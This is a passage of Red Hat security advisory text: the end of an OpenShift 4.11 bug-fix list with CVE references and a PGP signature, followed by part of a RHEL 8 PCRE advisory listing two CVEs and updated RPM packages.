release\n2090730 - must-gather should include multus logs. \n2090731 - nmstate deploys two instances of webhook on a single-node cluster\n2090751 - oc image mirror skip-missing flag does not skip images\n2090755 - MetalLB: BGPAdvertisement validation allows duplicate entries for ip pool selector, ip address pools, node selector and bgp peers\n2090774 - Add Readme to plugin directory\n2090794 - MachineConfigPool cannot apply a configuration after fixing the pods that caused a drain alert\n2090809 - gm.ClockClass invalid syntax parse error in linux ptp daemon logs\n2090816 - OCP 4.8 Baremetal IPI installation failure: \"Bootstrap failed to complete: timed out waiting for the condition\"\n2090819 - oc-mirror does not catch invalid registry input when a namespace is specified\n2090827 - Rebase CoreDNS to 1.9.2 and k8s 1.24\n2090829 - Bump OpenShift router to k8s 1.24\n2090838 - Flaky test: ignore flapping host interface \u0027tunbr\u0027\n2090843 - addLogicalPort() performance/scale optimizations\n2090895 - Dynamic plugin nav extension \"startsWith\" property does not work\n2090929 - [etcd] cluster-backup.sh script has a conflict to use the \u0027/etc/kubernetes/static-pod-certs\u0027 folder if a custom API certificate is defined\n2090993 - [AI Day2] Worker node overview page crashes in Openshift console with TypeError\n2091029 - Cancel rollout action only appears when rollout is completed\n2091030 - Some BM may fail booting with default bootMode strategy\n2091033 - [Descheduler]: provide ability to override included/excluded namespaces\n2091087 - ODC Helm backend Owners file needs updates\n2091106 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3\n2091142 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3\n2091167 - IPsec runtime enabling not work in hypershift\n2091218 - Update Dev Console Helm backend to use helm 3.9.0\n2091433 - Update AWS instance types\n2091542 - Error Loading/404 not found page shown after clicking \"Current namespace only\"\n2091547 - Internet connection test with proxy permanently fails\n2091567 - oVirt CSI driver should use latest go-ovirt-client\n2091595 - Alertmanager configuration can\u0027t use OpsGenie\u0027s entity field when AlertmanagerConfig is enabled\n2091599 - PTP Dual Nic | Extend Events 4.11 - Up/Down master interface affects all the other interface in the same NIC accoording the events and metric\n2091603 - WebSocket connection restarts when switching tabs in WebTerminal\n2091613 - simple-kmod fails to build due to missing KVC\n2091634 - OVS 2.15 stops handling traffic once ovs-dpctl(2.17.2) is used against it\n2091730 - MCO e2e tests are failing with \"No token found in openshift-monitoring secrets\"\n2091746 - \"Oh no! Something went wrong\" shown after user creates MCP without \u0027spec\u0027\n2091770 - CVO gets stuck downloading an upgrade, with the version pod complaining about invalid options\n2091854 - clusteroperator status filter doesn\u0027t match all values in Status column\n2091901 - Log stream paused right after updating log lines in Web Console in OCP4.10\n2091902 - unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server has received too many requests and has asked us to try again later\n2091990 - wrong external-ids for ovn-controller lflow-cache-limit-kb\n2092003 - PR 3162 | BZ 2084450 - invalid URL schema for AWS causes tests to perma fail and break the cloud-network-config-controller\n2092041 - Bump cluster-dns-operator to k8s 1.24\n2092042 - Bump cluster-ingress-operator to k8s 1.24\n2092047 - Kube 1.24 rebase for cloud-network-config-controller\n2092137 - Search doesn\u0027t show all entries when name filter is cleared\n2092296 - Change Default MachineCIDR of Power VS Platform from 10.x to 192.168.0.0/16\n2092390 - [RDR] [UI] Multiple instances of Object Bucket, Object Bucket Claims and \u0027Overview\u0027 tab is present under Storage section on the Hub cluster when navigated back from the Managed cluster using the Hybrid console dropdown\n2092395 - etcdHighNumberOfFailedGRPCRequests alerts with wrong results\n2092408 - Wrong icon is used in the virtualization overview permissions card\n2092414 - In virtualization overview \"running vm per templates\" template list can be improved\n2092442 - Minimum time between drain retries is not the expected one\n2092464 - marketplace catalog defaults to v4.10\n2092473 - libovsdb performance backports\n2092495 - ovn: use up to 4 northd threads in non-SNO clusters\n2092502 - [azure-file-csi-driver] Stop shipping a NFS StorageClass\n2092509 - Invalid memory address error if non existing caBundle is configured in DNS-over-TLS using ForwardPlugins\n2092572 - acm-simple-kmod chart should create the namespace on the spoke cluster\n2092579 - Don\u0027t retry pod deletion if objects are not existing\n2092650 - [BM IPI with Provisioning Network] Worker nodes are not provisioned: ironic-agent is stuck before writing into disks\n2092703 - Incorrect mount propagation information in container status\n2092815 - can\u0027t delete the unwanted image from registry by oc-mirror\n2092851 - [Descheduler]: allow to customize the LowNodeUtilization strategy thresholds\n2092867 - make repository name unique in acm-ice/acm-simple-kmod examples\n2092880 - etcdHighNumberOfLeaderChanges returns incorrect number of leadership changes\n2092887 - oc-mirror list releases command uses filter-options flag instead of filter-by-os\n2092889 - Incorrect updating of EgressACLs using direction \"from-lport\"\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n2092937 - WebScale: OVN-k8s forwarding to external-gw over the secondary interfaces failing\n2092966 - [OCP 4.11] [azure] /etc/udev/rules.d/66-azure-storage.rules missing from initramfs\n2093044 - Azure machine-api-provider-azure Availability Set Name Length Limit\n2093047 - Dynamic Plugins: Generated API markdown duplicates `checkAccess` and `useAccessReview` doc\n2093126 - [4.11] Bootimage bump tracker\n2093236 - DNS operator stopped reconciling after 4.10 to 4.11 upgrade | 4.11 nightly to 4.11 nightly upgrade\n2093288 - Default catalogs fails liveness/readiness probes\n2093357 - Upgrading sno spoke with acm-ice, causes the sno to get unreachable\n2093368 - Installer orphans FIPs created for LoadBalancer Services on `cluster destroy`\n2093396 - Remove node-tainting for too-small MTU\n2093445 - ManagementState reconciliation breaks SR\n2093454 - Router proxy protocol doesn\u0027t work with dual-stack (IPv4 and IPv6) clusters\n2093462 - Ingress Operator isn\u0027t reconciling the ingress cluster operator object\n2093586 - Topology: Ctrl+space opens the quick search modal, but doesn\u0027t close it again\n2093593 - Import from Devfile shows configuration options that shoudn\u0027t be there\n2093597 - Import: Advanced option sentence is splited into two parts and headlines has no padding\n2093600 - Project access tab should apply new permissions before it delete old ones\n2093601 - Project access page doesn\u0027t allow the user to update the settings twice (without manually reload the content)\n2093783 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.24\n2093797 - \u0027oc registry login\u0027 with serviceaccount function need update\n2093819 - An etcd member for a new machine was never added to the cluster\n2093930 - Gather console helm install totals metric\n2093957 - Oc-mirror write dup metadata to registry backend\n2093986 - Podsecurity violation error getting logged for pod-identity-webhook\n2093992 - Cluster version operator acknowledges upgrade failing on periodic-ci-openshift-release-master-nightly-4.11-e2e-metal-ipi-upgrade-ovn-ipv6\n2094023 - Add Git Flow - Template Labels for Deployment show as DeploymentConfig\n2094024 - bump oauth-apiserver deps to include 1.23.1 k8s that fixes etcd blips\n2094039 - egressIP panics with nil pointer dereference\n2094055 - Bump coreos-installer for s390x Secure Execution\n2094071 - No runbook created for SouthboundStale alert\n2094088 - Columns in NBDB may never be updated by OVNK\n2094104 - Demo dynamic plugin image tests should be skipped when testing console-operator\n2094152 - Alerts in the virtualization overview status card aren\u0027t filtered\n2094196 - Add default and validating webhooks for Power VS MAPI\n2094227 - Topology: Create Service Binding should not be the last option (even under delete)\n2094239 - custom pool Nodes with 0 nodes are always populated in progress bar\n2094303 - If og is configured with sa, operator installation will be failed. \n2094335 - [Nutanix] - debug logs are enabled by default in machine-controller\n2094342 - apirequests limits of Cluster CAPI Operator are too low for Azure platform\n2094438 - Make AWS URL parsing more lenient for GetNodeEgressIPConfiguration\n2094525 - Allow automatic upgrades for efs operator\n2094532 - ovn-windows CI jobs are broken\n2094675 - PTP Dual Nic | Extend Events 4.11 - when kill the phc2sys We have notification for the ptp4l physical master moved to free run\n2094694 - [Nutanix] No cluster name sanity validation - cluster name with a dot (\".\") character\n2094704 - Verbose log activated on kube-rbac-proxy in deployment prometheus-k8s\n2094801 - Kuryr controller keep restarting when handling IPs with leading zeros\n2094806 - Machine API oVrit component should use K8s 1.24 dependencies\n2094816 - Kuryr controller restarts when over quota\n2094833 - Repository overview page does not show default PipelineRun template for developer user\n2094857 - CloudShellTerminal loops indefinitely if DevWorkspace CR goes into failed state\n2094864 - Rebase CAPG to latest changes\n2094866 - oc-mirror does not always delete all manifests associated with an image during pruning\n2094896 - Run \u0027openshift-install agent create image\u0027 has segfault exception if cluster-manifests directory missing\n2094902 - Fix installer cross-compiling\n2094932 - MGMT-10403 Ingress should enable single-node cluster expansion on upgraded clusters\n2095049 - managed-csi StorageClass does not create PVs\n2095071 - Backend tests fails after devfile registry update\n2095083 - Observe \u003e Dashboards: Graphs may change a lot on automatic refresh\n2095110 - [ovn] northd container termination script must use bash\n2095113 - [ovnkube] bump to openvswitch2.17-2.17.0-22.el8fdp\n2095226 - Added changes to verify cloud connection and dhcpservices quota of a powervs instance\n2095229 - ingress-operator pod in CrashLoopBackOff in 4.11 after upgrade starting in 4.6 due to go panic\n2095231 - Kafka Sink sidebar in topology is empty\n2095247 - Event sink form doesn\u0027t show channel as sink until app is refreshed\n2095248 - [vSphere-CSI-Driver] does not report volume count limits correctly caused pod with multi volumes maybe schedule to not satisfied volume count node\n2095256 - Samples Owner needs to be Updated\n2095264 - ovs-configuration.service fails with Error: Failed to modify connection \u0027ovs-if-br-ex\u0027: failed to update connection: error writing to file \u0027/etc/NetworkManager/systemConnectionsMerged/ovs-if-br-ex.nmconnection\u0027\n2095362 - oVirt CSI driver operator should use latest go-ovirt-client\n2095574 - e2e-agnostic CI job fails\n2095687 - Debug Container shown for build logs and on click ui breaks\n2095703 - machinedeletionhooks doesn\u0027t work in vsphere cluster and BM cluster\n2095716 - New PSA component for Pod Security Standards enforcement is refusing openshift-operators ns\n2095756 - CNO panics with concurrent map read/write\n2095772 - Memory requests for ovnkube-master containers are over-sized\n2095917 - Nutanix set osDisk with diskSizeGB rather than diskSizeMiB\n2095941 - DNS Traffic not kept local to zone or node when Calico SDN utilized\n2096053 - Builder Image icons in Git Import flow are hard to see in Dark mode\n2096226 - crio fails to bind to tentative IP, causing service failure since RHOCS was rebased on RHEL 8.6\n2096315 - NodeClockNotSynchronising alert\u0027s severity should be critical\n2096350 - Web console doesn\u0027t display webhook errors for upgrades\n2096352 - Collect whole journal in gather\n2096380 - acm-simple-kmod references deprecated KVC example\n2096392 - Topology node icons are not properly visible in Dark mode\n2096394 - Add page Card items background color does not match with column background color in Dark mode\n2096413 - br-ex not created due to default bond interface having a different mac address than expected\n2096496 - FIPS issue on OCP SNO with RT Kernel via performance profile\n2096605 - [vsphere] no validation checking for diskType\n2096691 - [Alibaba 4.11] Specifying ResourceGroup id in install-config.yaml, New pv are still getting created to default ResourceGroups\n2096855 - `oc adm release new` failed with error when use an existing multi-arch release image as input\n2096905 - Openshift installer should not use the prism client embedded in nutanix terraform provider\n2096908 - Dark theme issue in pipeline builder, Helm rollback form, and Git import\n2097000 - KafkaConnections disappear from Topology after creating KafkaSink in Topology\n2097043 - No clean way to specify operand issues to KEDA OLM operator\n2097047 - MetalLB: matchExpressions used in CR like L2Advertisement, BGPAdvertisement, BGPPeers allow duplicate entries\n2097067 - ClusterVersion history pruner does not always retain initial completed update entry\n2097153 - poor performance on API call to vCenter ListTags with thousands of tags\n2097186 - PSa autolabeling in 4.11 env upgraded from 4.10 does not work due to missing RBAC objects\n2097239 - Change Lower CPU limits for Power VS cloud\n2097246 - Kuryr: verify and unit jobs failing due to upstream OpenStack dropping py36 support\n2097260 - openshift-install create manifests failed for Power VS platform\n2097276 - MetalLB CI deploys the operator via manifests and not using the csv\n2097282 - chore: update external-provisioner to the latest upstream release\n2097283 - chore: update external-snapshotter to the latest upstream release\n2097284 - chore: update external-attacher to the latest upstream release\n2097286 - chore: update node-driver-registrar to the latest upstream release\n2097334 - oc plugin help shows \u0027kubectl\u0027\n2097346 - Monitoring must-gather doesn\u0027t seem to be working anymore in 4.11\n2097400 - Shared Resource CSI Driver needs additional permissions for validation webhook\n2097454 - Placeholder bug for OCP 4.11.0 metadata release\n2097503 - chore: rebase against latest external-resizer\n2097555 - IngressControllersNotUpgradeable: load balancer service has been modified; changes must be reverted before upgrading\n2097607 - Add Power VS support to Webhooks tests in actuator e2e test\n2097685 - Ironic-agent can\u0027t restart because of existing container\n2097716 - settings under httpConfig is dropped with AlertmanagerConfig v1beta1\n2097810 - Required Network tools missing for Testing e2e PTP\n2097832 - clean up unused IPv6DualStackNoUpgrade feature gate\n2097940 - openshift-install destroy cluster traps if vpcRegion not specified\n2097954 - 4.11 installation failed at monitoring and network clusteroperators with error \"conmon: option parsing failed: Unknown option --log-global-size-max\" making all jobs failing\n2098172 - oc-mirror does not validatethe registry in the storage config\n2098175 - invalid license in python-dataclasses-0.8-2.el8 spec\n2098177 - python-pint-0.10.1-2.el8 has unused Patch0 in spec file\n2098242 - typo in SRO specialresourcemodule\n2098243 - Add error check to Platform create for Power VS\n2098392 - [OCP 4.11] Ironic cannot match \"wwn\" rootDeviceHint for a multipath device\n2098508 - Control-plane-machine-set-operator report panic\n2098610 - No need to check the push permission with ?manifests-only option\n2099293 - oVirt cluster API provider should use latest go-ovirt-client\n2099330 - Edit application grouping is shown to user with view only access in a cluster\n2099340 - CAPI e2e tests for AWS are missing\n2099357 - ovn-kubernetes needs explicit RBAC coordination leases for 1.24 bump\n2099358 - Dark mode+Topology update: Unexpected selected+hover border and background colors for app groups\n2099528 - Layout issue: No spacing in delete modals\n2099561 - Prometheus returns HTTP 500 error on /favicon.ico\n2099582 - Format and update Repository overview content\n2099611 - Failures on etcd-operator watch channels\n2099637 - Should print error when use --keep-manifest-list\\xfalse for manifestlist image\n2099654 - Topology performance: Endless rerender loop when showing a Http EventSink (KameletBinding)\n2099668 - KubeControllerManager should degrade when GC stops working\n2099695 - Update CAPG after rebase\n2099751 - specialresourcemodule stacktrace while looping over build status\n2099755 - EgressIP node\u0027s mgmtIP reachability configuration option\n2099763 - Update icons for event sources and sinks in topology, Add page, and context menu\n2099811 - UDP Packet loss in OpenShift using IPv6 [upcall]\n2099821 - exporting a pointer for the loop variable\n2099875 - The speaker won\u0027t start if there\u0027s another component on the host listening on 8080\n2099899 - oc-mirror looks for layers in the wrong repository when searching for release images during publishing\n2099928 - [FJ OCP4.11 Bug]: Add unit tests to image_customization_test file\n2099968 - [Azure-File-CSI] failed to provisioning volume in ARO cluster\n2100001 - Sync upstream v1.22.0 downstream\n2100007 - Run bundle-upgrade failed from the traditional File-Based Catalog installed operator\n2100033 - OCP 4.11 IPI - Some csr remain \"Pending\" post deployment\n2100038 - failure to update special-resource-lifecycle table during update Event\n2100079 - SDN needs explicit RBAC coordination leases for 1.24 bump\n2100138 - release info --bugs has no differentiator between Jira and Bugzilla\n2100155 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation\n2100159 - Dark theme: Build icon for pending status is not inverted in topology sidebar\n2100323 - Sqlit-based catsrc cannot be ready due to \"Error: open ./db-xxxx: permission denied\"\n2100347 - KASO retains old config values when switching from Medium/Default to empty worker latency profile\n2100356 - Remove Condition tab and create option from console as it is deprecated in OSP-1.8\n2100439 - [gce-pd] GCE PD in-tree storage plugin tests not running\n2100496 - [OCPonRHV]-oVirt API returns affinity groups without a description field\n2100507 - Remove redundant log lines from obj_retry.go\n2100536 - Update API to allow EgressIP node reachability check\n2100601 - Update CNO to allow EgressIP node reachability check\n2100643 - [Migration] [GCP]OVN can not rollback to SDN\n2100644 - openshift-ansible FTBFS on RHEL8\n2100669 - Telemetry should not log the full path if it contains a username\n2100749 - [OCP 4.11] multipath support needs multipath modules\n2100825 - Update machine-api-powervs go modules to latest version\n2100841 - tiny openshift-install usability fix for setting KUBECONFIG\n2101460 - An etcd member for a new machine was never added to the cluster\n2101498 - Revert Bug 2082599: add upper bound to number of failed attempts\n2102086 - The base image is still 4.10 for operator-sdk 1.22\n2102302 - Dummy bug for 4.10 backports\n2102362 - Valid regions should be allowed in GCP install config\n2102500 - Kubernetes NMState pods can not evict due to PDB on an SNO cluster\n2102639 - Drain happens before other image-registry pod is ready to service requests, causing disruption\n2102782 - topolvm-controller get into CrashLoopBackOff few minutes after install\n2102834 - [cloud-credential-operator]container has runAsNonRoot and image will run as root\n2102947 - [VPA] recommender is logging errors for pods with init containers\n2103053 - [4.11] Backport Prow CI improvements from master\n2103075 - Listing secrets in all namespaces with a specific labelSelector does not work properly\n2103080 - br-ex not created due to default bond interface having a different mac address than expected\n2103177 - disabling ipv6 router advertisements using \"all\" does not disable it on secondary interfaces\n2103728 - Carry HAProxy patch \u0027BUG/MEDIUM: h2: match absolute-path not path-absolute for :path\u0027\n2103749 - MachineConfigPool is not getting updated\n2104282 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec\n2104432 - [dpu-network-operator] Updating images to be consistent with ART\n2104552 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack\n2104561 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: \"/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit\"; expected: -rw-r--r--/420/0644; received: ----------/0/0\n2104589 - must-gather namespace should have ?privileged? warn and audit pod security labels besides enforce\n2104701 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes\n2104717 - NetworkPolicies: ovnkube-master pods crashing due to panic: \"invalid memory address or nil pointer dereference\"\n2104727 - Bootstrap node should honor http proxy\n2104906 - Uninstall fails with Observed a panic: runtime.boundsError\n2104951 - Web console doesn\u0027t display webhook errors for upgrades\n2104991 - Completed pods may not be correctly cleaned up\n2105101 - NodeIP is used instead of EgressIP if egressPod is recreated within 60 seconds\n2105106 - co/node-tuning: Waiting for 15/72 Profiles to be applied\n2105146 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history\n2105167 - BuildConfig throws error when using a label with a / in it\n2105334 - vmware-vsphere-csi-driver-controller can\u0027t use host port error on e2e-vsphere-serial\n2105382 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator\n2105468 - The ccoctl does not seem to know how to leverage the VMs service account to talk to GCP APIs. \n2105937 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.18\n2106051 - Unable to deploy acm-ice using latest SRO 4.11 build\n2106058 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers [4.11.0]\n2106062 - [4.11] Bootimage bump tracker\n2106116 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as \"0abc\"\n2106163 - Samples ImageStreams vs. registry.redhat.io: unsupported: V2 schema 1 manifest digests are no longer supported for image pulls\n2106313 - bond-cni: backport bond-cni GA items to 4.11\n2106543 - Typo in must-gather release-4.10\n2106594 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI\n2106723 - [4.11] Upgrade from 4.11.0-rc0 -\u003e 4.11.0-rc.1 failed. rpm-ostree status shows No space left on device\n2106855 - [4.11.z] externalTrafficPolicy=Local is not working in local gateway mode if ovnkube-node is restarted\n2107493 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing\n2107501 - metallb greenwave tests failure\n2107690 - Driver Container builds fail with \"error determining starting point for build: no FROM statement found\"\n2108175 - etcd backup seems to not be triggered in 4.10.18--\u003e4.10.20 upgrade\n2108617 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference\n2108686 - rpm-ostreed: start limit hit easily\n2110505 - [Upgrade]deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate\n2110715 - openshift-controller-manager(-operator) namespace should clear run-level annotations\n2111055 - dummy bug for 4.10.z bz2110938\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-25009\nhttps://access.redhat.com/security/cve/CVE-2018-25010\nhttps://access.redhat.com/security/cve/CVE-2018-25012\nhttps://access.redhat.com/security/cve/CVE-2018-25013\nhttps://access.redhat.com/security/cve/CVE-2018-25014\nhttps://access.redhat.com/security/cve/CVE-2018-25032\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-17541\nhttps://access.redhat.com/security/cve/CVE-2020-19131\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-28493\nhttps://access.redhat.com/security/cve/CVE-2020-35492\nhttps://access.redhat.com/security/cve/CVE-2020-36330\nhttps://access.redhat.com/security/cve/CVE-2020-36331\nhttps://access.redhat.com/security/cve/CVE-2020-36332\nhttps://access.redhat.com/security/cve/CVE-2021-3481\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3634\nhttps://access.redhat.com/security/cve/CVE-2021-3672\nhttps://access.redhat.com/security/cve/CVE-2021-3695\nhttps://access.redhat.com/security/cve/CVE-2021-3696\nhttps://access.redhat.com/security/cve/CVE-2021-3697\nhttps://access.redhat.com/security/cve/CVE-2021-3737\nhttps://access.redhat.com/security/cve/CVE-2021-4115\nhttps://access.redhat.com/security/cve/CVE-2021-4156\nhttps://access.redhat.com/security/cve/CVE-2021-4189\nhttps://access.redhat.com/security/cve/CVE-2021-20095\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-23566\nhttps://access.redhat.com/security/cve/CVE-2021-23648\nhttps://access.redhat.com/security/cve/CVE-2021-25219\nhttps://access.redhat.com/security/cve/CVE-2021-31535\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-38185\nhttps://access.redhat.com/security/cve/CVE-2021-38593\nhttps://access.redhat.com/security/cve/CVE-2021-40528\nhttps://access.redhat.com/security/cve/CVE-2021-41190\nhttps://access.redhat.com/security/cve/CVE-2021-41617\nhttps://access.redhat.com/security/cve/CVE-2021-42771\nhttps://access.redhat.com/security/cve/CVE-2021-43527\nhttps://access.redhat.com/security/cve/CVE-2021-43818\nhttps://access.redhat.com/security/cve/CVE-2021-44225\nhttps://access.redhat.com/security/cve/CVE-2021-44906\nhttps://access.redhat.com/security/cve/CVE-2022-0235\nhttps://access.redhat.com/security/cve/CVE-2022-0778\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1215\nhttps://access.redhat.com/security/cve/CVE-2022-1271\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1621\nhttps://access.redhat.com/security/cve/CVE-2022-1629\nhttps://access.redhat.com/security/cve/CVE-2022-1706\nhttps://access.redhat.com/security/cve/CVE-2022-1729\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-22576\nhttps://access.redhat.com/security/cve/CVE-2022-23772\nhttps://access.redhat.com/security/cve/CVE-2022-23773\nhttps://access.redhat.com/security/cve/CVE-2022-23806\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/cve/CVE-2022-24675\nhttps://access.redhat.com/security/cve/CVE-2022-24903\nhttps://access.redhat.com/security/cve/CVE-2022-24921\nhttps://access.redhat.com/security/cve/CVE-2022-25313\nhttps://access.redhat.com/security/cve/CVE-2022-25314\nhttps://access.redhat.com/security/cve/CVE-2022-26691\nhttps://access.redhat.com/security/cve/CVE-2022-26945\nhttps://access.redhat.com/security/cve/CVE-2022-27191\nhttps://access.redhat.com/security/cve/CVE-2022-27774\nhttps://access.redhat.com/security/cve/CVE-2022-27776\nhttps://access.redhat.com/security/cve/CVE-2022-27782\nhttps://access.redhat.com/security/cve/CVE-2022-28327\nhttps://access.redhat.com/security/cve/CVE-2022-28733\nhttps://access.redhat.com/security/cve/CVE-2022-28734\nhttps://access.redhat.com/security/cve/CVE-2022-28735\nhttps://access.redhat.com/security/cve/CVE-2022-28736\nhttps://access.redhat.com/security/cve/CVE-2022-28737\nhttps://access.redhat.com/security/cve/CVE-2022-29162\nhttps://access.redhat.com/security/cve/CVE-2022-29810\nhttps://access.redhat.com/security/cve/CVE-2022-29824\nhttps://access.redhat.com/security/cve/CVE-2022-30321\nhttps://access.redhat.com/security/cve/CVE-2022-30322\nhttps://access.redhat.com/security/cve/CVE-2022-30323\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYvOfk9zjgjWX9erEAQhJ/w//UlbBGKBBFBAyfEmQf9Zu0yyv6MfZW0Zl\niO1qXVIl9UQUFjTY5ejerx7cP8EBWLhKaiiqRRjbjtj+w+ENGB4LLj6TEUrSM5oA\nYEmhnX3M+GUKF7Px61J7rZfltIOGhYBvJ+qNZL2jvqz1NciVgI4/71cZWnvDbGpa\n02w3Dn0JzhTSR9znNs9LKcV/anttJ3NtOYhqMXnN8EpKdtzQkKRazc7xkOTxfxyl\njRiER2Z0TzKDE6dMoVijS2Sv5j/JF0LRwetkZl6+oh8ehKh5GRV3lPg3eVkhzDEo\n/gp0P9GdLMHi6cS6uqcREbod//waSAa7cssgULoycFwjzbDK3L2c+wMuWQIgXJca\nRYuP6wvrdGwiI1mgUi/226EzcZYeTeoKxnHkp7AsN9l96pJYafj0fnK1p9NM/8g3\njBE/W4K8jdDNVd5l1Z5O0Nyxk6g4P8MKMe10/w/HDXFPSgufiCYIGX4TKqb+ESIR\nSuYlSMjoGsB4mv1KMDEUJX6d8T05lpEwJT0RYNdZOouuObYMtcHLpRQHH9mkj86W\npHdma5aGG/mTMvSMW6l6L05uT41Azm6fVimTv+E5WvViBni2480CVH+9RexKKSyL\nXcJX1gaLdo+72I/gZrtT+XE5tcJ3Sf5fmfsenQeY4KFum/cwzbM6y7RGn47xlEWB\nxBWKPzRxz0Q=9r0B\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nPCRE is a Perl-compatible regular expression library. \n\nSecurity Fix(es):\n\n* pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed\nquantifier greater than 1 (CVE-2019-20838)\n\n* pcre: Integer overflow when parsing callout numeric arguments\n(CVE-2020-14155)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1848436 - CVE-2020-14155 pcre: Integer overflow when parsing callout numeric arguments\n1848444 - CVE-2019-20838 pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\npcre-8.42-6.el8.src.rpm\n\naarch64:\npcre-8.42-6.el8.aarch64.rpm\npcre-cpp-8.42-6.el8.aarch64.rpm\npcre-cpp-debuginfo-8.42-6.el8.aarch64.rpm\npcre-debuginfo-8.42-6.el8.aarch64.rpm\npcre-debugsource-8.42-6.el8.aarch64.rpm\npcre-devel-8.42-6.el8.aarch64.rpm\npcre-tools-debuginfo-8.42-6.el8.aarch64.rpm\npcre-utf16-8.42-6.el8.aarch64.rpm\npcre-utf16-debuginfo-8.42-6.el8.aarch64.rpm\npcre-utf32-8.42-6.el8.aarch64.rpm\npcre-utf32-debuginfo-8.42-6.el8.aarch64.rpm\n\nppc64le:\npcre-8.42-6.el8.ppc64le.rpm\npcre-cpp-8.42-6.el8.ppc64le.rpm\npcre-cpp-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-debugsource-8.42-6.el8.ppc64le.rpm\npcre-devel-8.42-6.el8.ppc64le.rpm\npcre-tools-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-utf16-8.42-6.el8.ppc64le.rpm\npcre-utf16-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-utf32-8.42-6.el8.ppc64le.rpm\npcre-utf32-debuginfo-8.42-6.el8.ppc64le.rpm\n\ns390x:\npcre-8.42-6.el8.s390x.rpm\npcre-cpp-8.42-6.el8.s390x.rpm\npcre-cpp-debuginfo-8.42-6.el8.s390x.rpm\npcre-debuginfo-8.42-6.el8.s390x.rpm\npcre-debugsource-8.42-6.el8.s390x.rpm\npcre-devel-8.42-6.el8.s390x.rpm\npcre-tools-debugin